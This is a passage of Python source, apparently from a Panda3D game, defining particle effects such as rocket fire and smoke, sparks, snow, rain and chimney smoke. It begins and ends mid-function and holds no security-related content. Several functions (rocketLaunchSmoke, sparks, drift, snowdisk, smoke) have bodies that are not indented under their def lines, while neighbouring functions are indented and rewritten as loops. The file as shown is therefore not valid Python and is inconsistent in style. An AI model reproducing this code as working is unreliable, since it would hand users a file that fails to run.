    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(20.0000)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 20.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
    # Sphere Volume parameters
    p0.emitter.setRadius(2.0000)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearSinkForce(Point3(0.0000, 0.0000, -79.0000), LinearDistanceForce.FTONEOVERRSQUARED, 15.9701, 95.0000, 1)
    force0.setActive(1)
    f0.addForce(force0)
    self.addForceGroup(f0)
@particle
def tt_p_efx_rocketLaunchFire(self):
    """Build the rocket-launch fire effect: growing fireball sprites from
    a line emitter whose color is interpolated white -> orange over each
    particle's life, in a 'Gravity' force group of two opposed vector
    forces.
    """
    self.reset()
    self.setPos(0.000, 0.000, 0.000)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("LineEmitter")
    p0.setPoolSize(50)
    p0.setBirthRate(0.0100)
    p0.setLitterSize(1)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(1.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(0.5000)
    p0.factory.setLifespanSpread(0.1000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAOUT)
    p0.renderer.setUserAlpha(0.69)
    # Sprite parameters
    # NOTE(review): texture load is commented out here — presumably the
    # texture is assigned by whoever instantiates this effect; confirm.
    # p0.renderer.addTextureFromFile('../../ttmodels/src/maps/tt_t_efx_fireball.tif')
    p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setXScaleFlag(1)
    p0.renderer.setYScaleFlag(1)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(2.0000)
    p0.renderer.setFinalXScale(4.0000)
    p0.renderer.setInitialYScale(1.0000)
    p0.renderer.setFinalYScale(4.0000)
    p0.renderer.setNonanimatedTheta(0.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Linear color ramp: white at 11% of life to orange at 100%.
    p0.renderer.getColorInterpolationManager().addLinear(0.10999999940395355,1.0,Vec4(1.0,1.0,1.0,1.0),Vec4(0.729411780834198,0.40392157435417175,0.11372549086809158,1.0),1)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(1.0000)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, -10.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
    # Line parameters
    p0.emitter.setEndpoint1(Point3(1.0000, 0.0000, 0.0000))
    p0.emitter.setEndpoint2(Point3(0.0000, 0.0000, 0.0000))
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('Gravity')
    # Force parameters
    force0 = LinearVectorForce(Vec3(0.0000, 0.0000, 2.5000), 1.0000, 0)
    force0.setVectorMasks(1, 1, 1)
    force0.setActive(1)
    f0.addForce(force0)
    force1 = LinearVectorForce(Vec3(0.0000, 0.0000, -3.0000), 5.0000, 0)
    force1.setVectorMasks(1, 1, 1)
    force1.setActive(1)
    f0.addForce(force1)
    self.addForceGroup(f0)
@particle
def icetnt(self):
    """Build the 'ice TNT' effect: 'spark' sprites from a small sphere
    volume, drawn down by a sink force. A disabled sparkle-renderer
    configuration is kept commented out below.
    """
    self.reset()
    self.setPos(0.000, 0.000, -0.000)
    self.setHpr(0.000, 10.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("SphereVolumeEmitter")
    p0.setPoolSize(40)
    p0.setBirthRate(0.1000)
    p0.setLitterSize(2)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(1.2000)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/spark")
    p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setXScaleFlag(1)
    p0.renderer.setYScaleFlag(1)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(0.3)
    p0.renderer.setFinalXScale(0.3)
    p0.renderer.setInitialYScale(0.3)
    p0.renderer.setFinalYScale(0.03)
    p0.renderer.setNonanimatedTheta(20.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Sparkle parameters
    #p0.renderer.setCenterColor(Vec4(0.78, 0.78, 0, 1.00))
    #p0.renderer.setEdgeColor(Vec4(0.78, 0.78, 0, 1.00))
    #p0.renderer.setBirthRadius(0.0600)
    #p0.renderer.setDeathRadius(0.0600)
    #p0.renderer.setLifeScale(SparkleParticleRenderer.SPNOSCALE)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(1.5000)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, -2.0000))
    # Sphere Volume parameters
    p0.emitter.setRadius(0.2282)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearSinkForce(Point3(0.0000, 0.0000, -19.0000), LinearDistanceForce.FTONEOVERRSQUARED, 15.9701, 95.0100, 1)
    force0.setActive(1)
    f0.addForce(force0)
    self.addForceGroup(f0)
@particle
def resistanceEffectSprite(self):
    """Build the 'resistance effect' sprite burst.

    The original generated code repeated an identical ~46-line particle
    system six times (p0..p5, 'particles-1'..'particles-6'); the six
    systems are built here in a loop with exactly the same names,
    parameters, and registration order, followed by the same
    LinearSinkForce group. No texture is assigned here — presumably set
    by the caller (TODO: confirm).
    """
    self.reset()
    self.setPos(0.000, 0.000, 0.000)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    # Six identical sprite systems, named 'particles-1' .. 'particles-6'.
    for i in range(6):
        p = Particles.Particles('particles-%d' % (i + 1))
        # Particles parameters
        p.setFactory("PointParticleFactory")
        p.setRenderer("SpriteParticleRenderer")
        p.setEmitter("SphereVolumeEmitter")
        p.setPoolSize(50)
        p.setBirthRate(0.1000)
        p.setLitterSize(50)
        p.setLitterSpread(0)
        p.setSystemLifespan(0.0000)
        p.setLocalVelocityFlag(1)
        p.setSystemGrowsOlderFlag(0)
        # Factory parameters
        p.factory.setLifespanBase(3.0000)
        p.factory.setLifespanSpread(0.0000)
        p.factory.setMassBase(1.0000)
        p.factory.setMassSpread(0.0000)
        p.factory.setTerminalVelocityBase(400.0000)
        p.factory.setTerminalVelocitySpread(0.0000)
        # Renderer parameters
        p.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
        p.renderer.setUserAlpha(1.00)
        # Sprite parameters
        p.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
        p.renderer.setXScaleFlag(0)
        p.renderer.setYScaleFlag(0)
        p.renderer.setAnimAngleFlag(0)
        p.renderer.setInitialXScale(0.5000)
        p.renderer.setFinalXScale(0.5000)
        p.renderer.setInitialYScale(0.5000)
        p.renderer.setFinalYScale(0.5000)
        p.renderer.setNonanimatedTheta(0.0000)
        p.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
        p.renderer.setAlphaDisable(0)
        # Emitter parameters
        p.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
        p.emitter.setAmplitude(20.0000)
        p.emitter.setAmplitudeSpread(0.0000)
        p.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 20.0000))
        p.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
        p.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
        # Sphere Volume parameters
        p.emitter.setRadius(2.0000)
        self.addParticles(p)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearSinkForce(Point3(0.0000, 0.0000, -79.0000), LinearDistanceForce.FTONEOVERRSQUARED, 15.9701, 95.0000, 1)
    force0.setActive(1)
    f0.addForce(force0)
    self.addForceGroup(f0)
@particle
def splashlines(self):
    """Build the 'splash lines' effect: one burst of 40 line particles
    (birth interval 1000 s, so only the initial litter fires per that
    interval) radiating with a strong upward offset, pulled back down by
    a deep sink force.
    """
    self.reset()
    self.setPos(0.000, 0.000, 0.000)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("LineParticleRenderer")
    p0.setEmitter("SphereVolumeEmitter")
    p0.setPoolSize(40)
    p0.setBirthRate(1000)
    p0.setLitterSize(40)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(2.0)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    p0.renderer.setUserAlpha(1.00)
    # Line parameters
    p0.renderer.setHeadColor(Vec4(0.02, 0.67, 0.92, 1.00))
    p0.renderer.setTailColor(Vec4(1.00, 1.00, 1.00, 1.00))
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(9.0000)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 9.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, -2.0000))
    # Sphere Volume parameters
    p0.emitter.setRadius(3.2282)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearSinkForce(Point3(0.0000, 0.0000, -79.0000), LinearDistanceForce.FTONEOVERRSQUARED, 15.9701, 95.0100, 1)
    force0.setActive(1)
    f0.addForce(force0)
    self.addForceGroup(f0)
@particle
def resistanceEffectBean(self):
    # Resistance-effect "jellybean" burst: five identically configured
    # geom-particle systems named 'particles-1' .. 'particles-5', each
    # radiating out of a 2-unit sphere volume, followed by one shared
    # one-over-r-squared sink force pulling particles toward z = -79.
    # The original file spelled out each system p0..p4 verbatim; this
    # version builds them in a loop with the exact same settings and
    # registration order.
    self.reset()
    self.setPos(0.000, 0.000, 0.000)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    for index in range(5):
        system = Particles.Particles('particles-%d' % (index + 1))
        # Particles parameters
        system.setFactory("PointParticleFactory")
        system.setRenderer("GeomParticleRenderer")
        system.setEmitter("SphereVolumeEmitter")
        system.setPoolSize(20)
        system.setBirthRate(0.1000)
        system.setLitterSize(20)
        system.setLitterSpread(0)
        system.setSystemLifespan(0.0000)
        system.setLocalVelocityFlag(1)
        system.setSystemGrowsOlderFlag(0)
        # Factory parameters
        system.factory.setLifespanBase(3.0000)
        system.factory.setLifespanSpread(0.0000)
        system.factory.setMassBase(1.0000)
        system.factory.setMassSpread(0.0000)
        system.factory.setTerminalVelocityBase(400.0000)
        system.factory.setTerminalVelocitySpread(0.0000)
        # Renderer parameters
        system.renderer.setAlphaMode(BaseParticleRenderer.PRALPHANONE)
        system.renderer.setUserAlpha(1.00)
        # Geom parameters -- the bean geometry is attached elsewhere:
        # system.renderer.setGeomNode(jellybean4.egg)
        # Emitter parameters
        system.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
        system.emitter.setAmplitude(20.0000)
        system.emitter.setAmplitudeSpread(0.0000)
        system.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 20.0000))
        system.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
        system.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
        # Sphere Volume parameters
        system.emitter.setRadius(2.0000)
        self.addParticles(system)
    forces = ForceGroup.ForceGroup('forces')
    # Force parameters
    sink = LinearSinkForce(Point3(0.0000, 0.0000, -79.0000), LinearDistanceForce.FTONEOVERRSQUARED, 15.9701, 95.0000, 1)
    sink.setActive(1)
    forces.addForce(sink)
    self.addForceGroup(forces)
@particle
def tt_p_efx_rocketLaunchSmoke(self):
# Rocket-launch smoke: sprite particles emitted from a disc 16 units up,
# growing from 2x1 to 4x4 scale while fading white -> grey, pushed gently
# upward by a vector force.
self.reset()
self.setPos(0.000, 0.000, 16.000)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(2.000, 2.000, 3.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("DiscEmitter")
p0.setPoolSize(300)
p0.setBirthRate(0.1000)
p0.setLitterSize(1)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(4.0000)
p0.factory.setLifespanSpread(0.1000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAINOUT)
p0.renderer.setUserAlpha(0.47)
# Sprite parameters
#p0.renderer.addTextureFromFile('../../ttmodels/src/maps/tt_t_efx_smoke.tif')
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(1)
p0.renderer.setYScaleFlag(1)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(2.0000)
p0.renderer.setFinalXScale(4.0000)
p0.renderer.setInitialYScale(1.0000)
p0.renderer.setFinalYScale(4.0000)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Linear color ramp over the full lifetime: pure white to mid grey (0.588...).
p0.renderer.getColorInterpolationManager().addLinear(0.0,1.0,Vec4(1.0,1.0,1.0,1.0),Vec4(0.58823531866073608,0.58823531866073608,0.58823531866073608,1.0),1)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(0.4000)
p0.emitter.setAmplitudeSpread(2.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, -5.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Disc parameters
p0.emitter.setRadius(1.0000)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('Gravity')
# Force parameters
# Despite the group name, this is a mild upward push (+2.5 on z).
force0 = LinearVectorForce(Vec3(0.0000, 0.0000, 2.5000), 1.0000, 0)
force0.setVectorMasks(1, 1, 1)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def sparks(self):
# Sparks: tiny shrinking sprites launched explicitly from a line segment,
# then scattered by three directional forces plus a jitter force.
self.reset()
self.setPos(0.000, 0.000, 0.000)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("LineEmitter")
p0.setPoolSize(1024)
p0.setBirthRate(0.0200)
p0.setLitterSize(8)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(0.5000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(1)
p0.renderer.setYScaleFlag(1)
p0.renderer.setAnimAngleFlag(0)
# Sprites shrink to nothing over their half-second lifespan.
p0.renderer.setInitialXScale(0.256)
p0.renderer.setFinalXScale(0.0000)
p0.renderer.setInitialYScale(0.256)
p0.renderer.setFinalYScale(0.0000)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(1)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETEXPLICIT)
p0.emitter.setAmplitude(0.0000)
p0.emitter.setAmplitudeSpread(10.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 1.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(0.0000, 0.0000, 1.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Line parameters
p0.emitter.setEndpoint1(Point3(0.5000, 5.0000, -0.5000))
p0.emitter.setEndpoint2(Point3(0.75000, -5.0000, 2.5000))
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('sparkforces')
# Force parameters
force0 = LinearVectorForce(Vec3(1.0000, 0.0000, 0.0000), -50.0000, 0)
force0.setActive(1)
f0.addForce(force0)
force1 = LinearVectorForce(Vec3(0.0000, -1.0000, 0.0000), 100.0000, 0)
force1.setActive(1)
f0.addForce(force1)
force2 = LinearVectorForce(Vec3(0.0000, 0.0000, -1.0000), 20.0000, 0)
force2.setActive(1)
f0.addForce(force2)
force3 = LinearJitterForce(50.0000, 0)
force3.setActive(1)
f0.addForce(force3)
self.addForceGroup(f0)
@particle
def drift(self):
# Drift: short-lived spinning sprites (ZSpin factory) emitted at a point,
# growing from 0.375 to 0.75 scale, then blown about by vector and jitter
# forces in the 'Smoke' force group.
self.reset()
self.setPos(0.000, 0.000, 0.000)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("ZSpinParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("PointEmitter")
p0.setPoolSize(1024)
p0.setBirthRate(0.0750)
p0.setLitterSize(7)
p0.setLitterSpread(2)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(0.1750)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Z Spin factory parameters
p0.factory.enableAngularVelocity(1)
p0.factory.setInitialAngle(0.0000)
p0.factory.setInitialAngleSpread(45.0000)
p0.factory.setFinalAngle(0.0000)
p0.factory.setFinalAngleSpread(0.0000)
p0.factory.setAngularVelocity(0.0000)
p0.factory.setAngularVelocitySpread(90.0000)
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAOUT)
p0.renderer.setUserAlpha(0.50)
# Sprite parameters
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(1)
p0.renderer.setYScaleFlag(1)
p0.renderer.setAnimAngleFlag(1)
p0.renderer.setInitialXScale(0.375)
p0.renderer.setFinalXScale(0.750)
p0.renderer.setInitialYScale(0.375)
p0.renderer.setFinalYScale(0.750)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
#p0.renderer.setColorBlendMode(ColorBlendAttrib.MAdd,ColorBlendAttrib.OIncomingAlpha,ColorBlendAttrib.OOneMinusIncomingAlpha)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETEXPLICIT)
p0.emitter.setAmplitude(1.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Sphere Volume parameters
p0.emitter.setLocation(Point3(0.0000,0.0000,0.0000))
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('Smoke')
# Force parameters
# Note: force0 has magnitude 0, so only the -y, +z and jitter forces act.
force0 = LinearVectorForce(Vec3(1.0000, 0.0000, 0.0000), 0.0000, 0)
force0.setActive(1)
f0.addForce(force0)
force1 = LinearVectorForce(Vec3(0.0000, -1.0000, 0.0000), 100.0000, 0)
force1.setActive(1)
f0.addForce(force1)
force2 = LinearVectorForce(Vec3(0.0000, 0.0000, 1.0000), 50.0000, 0)
force2.setActive(1)
f0.addForce(force2)
# The generated name skips 'force3'; kept as-is for fidelity.
force4 = LinearJitterForce(100.0000, 0)
force4.setActive(1)
f0.addForce(force4)
self.addForceGroup(f0)
@particle
def snowdisk(self):
# Snow: spinning snowflake sprites emitted from a wide (radius 50) disc,
# falling under a gentle downward force with jitter for drift.
self.reset()
self.setPos(0.000, 0.000, 0.000)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("ZSpinParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("DiscEmitter")
p0.setPoolSize(1024)
p0.setBirthRate(0.0200)
p0.setLitterSize(1)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(4.5000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Z Spin factory parameters
p0.factory.setInitialAngle(0.0000)
p0.factory.setInitialAngleSpread(10.0000)
p0.factory.enableAngularVelocity(1)
p0.factory.setAngularVelocity(0.0000)
p0.factory.setAngularVelocitySpread(500.0000)
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAIN)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_8/models/props/snowflake_particle", "**/p1_2")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
# X/Y scale flags are off, so the initial/final scales below are inert.
p0.renderer.setXScaleFlag(0)
p0.renderer.setYScaleFlag(0)
p0.renderer.setAnimAngleFlag(1)
p0.renderer.setInitialXScale(0.03125)
p0.renderer.setFinalXScale(0.50)
p0.renderer.setInitialYScale(0.03125)
p0.renderer.setFinalYScale(0.50)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(0.1000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Disc parameters
p0.emitter.setRadius(50.0000)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('gravity')
# Force parameters
force0 = LinearVectorForce(Vec3(0.0000, 0.0000, -1.0000), 1.5000, 0)
force0.setActive(1)
f0.addForce(force0)
force1 = LinearJitterForce(10.0000, 0)
force1.setActive(1)
f0.addForce(force1)
self.addForceGroup(f0)
@particle
def raindisk(self):
    # Rain: translucent line particles streaming down from a wide disc
    # (radius 100) positioned 50 units overhead; the emitter's offset force
    # gives each drop a strong downward, slightly sideways velocity.
    # No force group -- motion comes entirely from the emitter.
    self.reset()
    self.setPos(0.0, 5.0, 50.0)
    self.setHpr(0.0, 0.0, 0.0)
    self.setScale(1.0, 1.0, 1.0)
    rain = Particles.Particles('particles-1')
    # Particles parameters
    rain.setFactory('PointParticleFactory')
    rain.setRenderer('LineParticleRenderer')
    rain.setEmitter('DiscEmitter')
    rain.setPoolSize(4096)
    rain.setBirthRate(0.02)
    rain.setLitterSize(20)
    rain.setLitterSpread(0)
    rain.setSystemLifespan(0.0)
    rain.setLocalVelocityFlag(1)
    rain.setSystemGrowsOlderFlag(0)
    # Factory parameters
    rain.factory.setLifespanBase(1.0)
    rain.factory.setLifespanSpread(0.0)
    rain.factory.setMassBase(1.0)
    rain.factory.setMassSpread(0.0)
    rain.factory.setTerminalVelocityBase(400.0)
    rain.factory.setTerminalVelocitySpread(0.0)
    # Renderer parameters: blue-grey head, fainter grey tail.
    rain.renderer.setAlphaMode(BaseParticleRenderer.PRALPHANONE)
    rain.renderer.setUserAlpha(1.0)
    rain.renderer.setHeadColor(Vec4(0.39, 0.39, 0.58, 0.49))
    rain.renderer.setTailColor(Vec4(0.39, 0.39, 0.39, 0.29))
    rain.renderer.setLineScaleFactor(1.7)
    # Emitter parameters
    rain.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    rain.emitter.setAmplitude(1.2)
    rain.emitter.setAmplitudeSpread(0.0)
    rain.emitter.setOffsetForce(Vec3(11.3, 0.0, -41.0))
    rain.emitter.setExplicitLaunchVector(Vec3(1.0, 0.0, 0.0))
    rain.emitter.setRadiateOrigin(Point3(0.0, 0.0, 0.0))
    rain.emitter.setRadius(100.0)
    self.addParticles(rain)
@particle
def smoke(self):
# Chimney-style smoke: dark, semi-transparent textured sprites emitted
# from a tiny sphere, drawn toward a nearby sink and pushed along -y.
self.reset()
self.setPos(0.000, 3.500, 5.100)
self.setHpr(-180.000, 80.000, -180.000)
self.setScale(0.0250, 0.0250, 0.0250)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(50)
p0.setBirthRate(0.0300)
p0.setLitterSize(1)
p0.setLitterSpread(1)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(1.6000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
p0.renderer.setIgnoreScale(1)
p0.renderer.addTextureFromFile('phase_6/maps/tt_t_efx_ext_smoke_a.rgb')
p0.renderer.setColor(Vec4(0.10, 0.10, 0.10, 0.10))
p0.renderer.setXScaleFlag(1)
p0.renderer.setYScaleFlag(1)
p0.renderer.setAnimAngleFlag(0)
# Puffs shrink from 0.6 to 0.3 over their lifetime.
p0.renderer.setInitialXScale(0.6)
p0.renderer.setFinalXScale(0.3)
p0.renderer.setInitialYScale(0.6)
p0.renderer.setFinalYScale(0.3)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(2.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, -4.0000))
